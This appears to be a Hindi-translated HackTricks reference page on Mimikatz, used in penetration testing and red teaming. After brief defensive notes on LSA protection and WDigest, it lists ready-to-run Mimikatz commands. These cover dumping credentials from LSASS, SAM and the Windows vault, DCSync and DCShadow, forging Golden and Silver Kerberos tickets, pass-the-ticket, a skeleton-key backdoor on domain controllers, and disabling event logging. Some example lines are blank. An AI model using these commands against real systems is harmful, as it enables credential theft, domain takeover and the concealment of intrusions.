Mimikatz
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
This page is based on one from adsecurity.org. Check the original for further info!
Windows 8.1 और Windows Server 2012 R2 से आगे, क्रेडेंशियल चोरी के खिलाफ सुरक्षा के लिए महत्वपूर्ण उपाय लागू किए गए हैं:
LM हैश और प्लेन-टेक्स्ट पासवर्ड अब मेमोरी में नहीं रखे जाते हैं ताकि सुरक्षा बढ़ सके। एक विशेष रजिस्ट्री सेटिंग, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" को 0
के DWORD मान के साथ कॉन्फ़िगर किया जाना चाहिए ताकि डाइजेस्ट प्रमाणीकरण को निष्क्रिय किया जा सके, यह सुनिश्चित करते हुए कि "क्लियर-टेक्स्ट" पासवर्ड LSASS में कैश नहीं होते हैं।
LSA सुरक्षा को स्थानीय सुरक्षा प्राधिकरण (LSA) प्रक्रिया को अनधिकृत मेमोरी पढ़ने और कोड इंजेक्शन से बचाने के लिए पेश किया गया है। यह LSASS को एक सुरक्षित प्रक्रिया के रूप में चिह्नित करके प्राप्त किया जाता है। LSA सुरक्षा को सक्रिय करने में शामिल हैं:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa पर रजिस्ट्री को संशोधित करना, RunAsPPL
को dword:00000001
पर सेट करना।
एक समूह नीति वस्तु (GPO) को लागू करना जो प्रबंधित उपकरणों में इस रजिस्ट्री परिवर्तन को लागू करता है।
इन सुरक्षा उपायों के बावजूद, Mimikatz जैसे उपकरण LSA सुरक्षा को विशेष ड्राइवरों का उपयोग करके दरकिनार कर सकते हैं, हालांकि ऐसे कार्यों को घटना लॉग में रिकॉर्ड किया जाने की संभावना है।
प्रशासकों के पास आमतौर पर SeDebugPrivilege होता है, जो उन्हें कार्यक्रमों को डिबग करने की अनुमति देता है। इस विशेषाधिकार को अनधिकृत मेमोरी डंप को रोकने के लिए प्रतिबंधित किया जा सकता है, जो हमलावरों द्वारा मेमोरी से क्रेडेंशियल निकालने के लिए उपयोग की जाने वाली एक सामान्य तकनीक है। हालाँकि, इस विशेषाधिकार को हटाने के बावजूद, TrustedInstaller खाता अभी भी एक अनुकूलित सेवा कॉन्फ़िगरेशन का उपयोग करके मेमोरी डंप कर सकता है:
यह lsass.exe
मेमोरी को एक फ़ाइल में डंप करने की अनुमति देता है, जिसे फिर किसी अन्य सिस्टम पर क्रेडेंशियल्स निकालने के लिए विश्लेषित किया जा सकता है:
Mimikatz में इवेंट लॉग छेड़छाड़ में दो मुख्य क्रियाएँ शामिल हैं: इवेंट लॉग को साफ करना और नए इवेंट्स के लॉगिंग को रोकने के लिए इवेंट सेवा को पैच करना। नीचे इन क्रियाओं को करने के लिए कमांड दिए गए हैं:
Command: यह क्रिया इवेंट लॉग को हटाने के लिए है, जिससे दुर्भावनापूर्ण गतिविधियों का पता लगाना कठिन हो जाता है।
Mimikatz अपने मानक दस्तावेज़ में सीधे इवेंट लॉग को उसके कमांड लाइन के माध्यम से साफ करने के लिए कोई सीधा कमांड प्रदान नहीं करता है। हालाँकि, इवेंट लॉग हेरफेर आमतौर पर Mimikatz के बाहर सिस्टम टूल या स्क्रिप्ट का उपयोग करके विशिष्ट लॉग को साफ करने में शामिल होता है (जैसे, PowerShell या Windows Event Viewer का उपयोग करना)।
Command: event::drop
यह प्रयोगात्मक कमांड इवेंट लॉगिंग सेवा के व्यवहार को संशोधित करने के लिए डिज़ाइन किया गया है, प्रभावी रूप से इसे नए इवेंट्स को रिकॉर्ड करने से रोकता है।
Example: mimikatz "privilege::debug" "event::drop" exit
privilege::debug
कमांड सुनिश्चित करता है कि Mimikatz आवश्यक विशेषाधिकारों के साथ सिस्टम सेवाओं को संशोधित करता है।
event::drop
कमांड फिर इवेंट लॉगिंग सेवा को पैच करता है।
एक Golden Ticket डोमेन-व्यापी पहुँच अनुकरण की अनुमति देता है। मुख्य कमांड और पैरामीटर:
Command: kerberos::golden
Parameters:
/domain
: डोमेन का नाम।
/sid
: डोमेन का सुरक्षा पहचानकर्ता (SID)।
/user
: अनुकरण करने के लिए उपयोगकर्ता नाम।
/krbtgt
: डोमेन के KDC सेवा खाते का NTLM हैश।
/ptt
: सीधे मेमोरी में टिकट को इंजेक्ट करता है।
/ticket
: बाद में उपयोग के लिए टिकट को सहेजता है।
Example:
Silver Tickets विशिष्ट सेवाओं तक पहुँच प्रदान करते हैं। मुख्य कमांड और पैरामीटर:
Command: Golden Ticket के समान लेकिन विशिष्ट सेवाओं को लक्षित करता है।
Parameters:
/service
: लक्षित सेवा (जैसे, cifs, http)।
अन्य पैरामीटर Golden Ticket के समान हैं।
Example:
Trust Tickets का उपयोग डोमेन के बीच संसाधनों तक पहुँचने के लिए विश्वास संबंधों का लाभ उठाने के लिए किया जाता है। मुख्य कमांड और पैरामीटर:
Command: Golden Ticket के समान लेकिन विश्वास संबंधों के लिए।
Parameters:
/target
: लक्षित डोमेन का FQDN।
/rc4
: ट्रस्ट खाते के लिए NTLM हैश।
Example:
Listing Tickets:
Command: kerberos::list
वर्तमान उपयोगकर्ता सत्र के लिए सभी Kerberos टिकटों की सूची बनाता है।
Pass the Cache:
Command: kerberos::ptc
कैश फ़ाइलों से Kerberos टिकटों को इंजेक्ट करता है।
Example: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Pass the Ticket:
Command: kerberos::ptt
किसी अन्य सत्र में Kerberos टिकट का उपयोग करने की अनुमति देता है।
Example: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Purge Tickets:
Command: kerberos::purge
सत्र से सभी Kerberos टिकटों को साफ करता है।
टिकट हेरफेर कमांड का उपयोग करने से पहले संघर्षों से बचने के लिए उपयोगी।
DCShadow: AD ऑब्जेक्ट हेरफेर के लिए एक मशीन को अस्थायी रूप से DC के रूप में कार्य करने के लिए बनाता है।
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: पासवर्ड डेटा का अनुरोध करने के लिए एक DC की नकल करता है।
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: LSA से क्रेडेंशियल निकालता है।
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: एक कंप्यूटर खाते के पासवर्ड डेटा का उपयोग करके DC का अनुकरण करता है।
NetSync के लिए मूल संदर्भ में कोई विशिष्ट कमांड प्रदान नहीं किया गया है।
LSADUMP::SAM: स्थानीय SAM डेटाबेस तक पहुँचता है।
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: रजिस्ट्री में संग्रहीत रहस्यों को डिक्रिप्ट करता है।
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: एक उपयोगकर्ता के लिए नया NTLM हैश सेट करता है।
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: ट्रस्ट प्रमाणीकरण जानकारी प्राप्त करता है।
mimikatz "lsadump::trust" exit
MISC::Skeleton: DC पर LSASS में एक बैकडोर इंजेक्ट करता है।
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: बैकअप अधिकार प्राप्त करता है।
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: डिबग विशेषाधिकार प्राप्त करता है।
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: लॉग-ऑन उपयोगकर्ताओं के लिए क्रेडेंशियल दिखाता है।
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: मेमोरी से Kerberos टिकट निकालता है।
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: SID और SIDHistory को बदलता है।
Add: mimikatz "sid::add /user:targetUser /sid:newSid" exit
Modify: मूल संदर्भ में संशोधन के लिए कोई विशिष्ट कमांड नहीं है।
TOKEN::Elevate: टोकन का अनुकरण करता है।
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: कई RDP सत्रों की अनुमति देता है।
mimikatz "ts::multirdp" exit
TS::Sessions: TS/RDP सत्रों की सूची बनाता है।
मूल संदर्भ में TS::Sessions के लिए कोई विशिष्ट कमांड प्रदान नहीं किया गया है।
Windows Vault से पासवर्ड निकालता है।
mimikatz "vault::cred /patch" exit
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)